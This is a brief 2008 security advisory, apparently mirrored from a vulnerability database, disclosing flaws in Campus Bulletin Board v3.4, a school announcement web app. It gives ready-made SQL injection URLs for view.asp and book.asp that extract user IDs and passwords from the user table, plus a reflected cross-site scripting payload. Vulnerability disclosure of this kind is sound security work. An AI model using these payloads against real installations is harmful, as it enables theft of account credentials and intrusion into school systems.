Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19913
HistoryMay 27, 2008 - 12:00 a.m.

Campus Bulletin Board v3.4 Multiple Remote Vulnerabilities

2008-05-2700:00:00
vulners.com
10

/ | || | _ \| _ | _ | |
| (
| _ | [)/| () | () | | |
\_____|
| ||| ||||| ||
C. H. R. O. O. T. SECURITY GROUP
- – ----- — – – ---- — – -
http://www.chroot.org

                 _   _ _ _____ ____ ____ __  _ 

Hacks In Taiwan | || | | | | | \| |
Conference 2008 | _ | | | | | (
| () | |
|
| ||| || \|||\__|
http://www.hitcon.org

Title :: Campus Bulletin Board v3.4 Multiple Remote Vulnerabilities

Author :: unohope [at] chroot [dot] org

IRC :: irc.chroot.org #chroot

ScriptName :: 校園行政網路公告欄 v3.4

Download :: http://netlab.kh.edu.tw/download/post3/post34_961113.exe

Mirror :: http://www.badongo.com/file/9514022


[SQL Injection]

  • {view.asp} -

http://localhost/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1

  • {book.asp} -

http://localhost/post3/book.asp?review=-99')+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+公佈欄+Where+'%'=('


[Cross Site-Scripting]

  • {book.asp} -

http://localhost/post3/Book.asp?review=<script>alert(/xss/)</script>


[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

2008/5/24 - chrO.ot group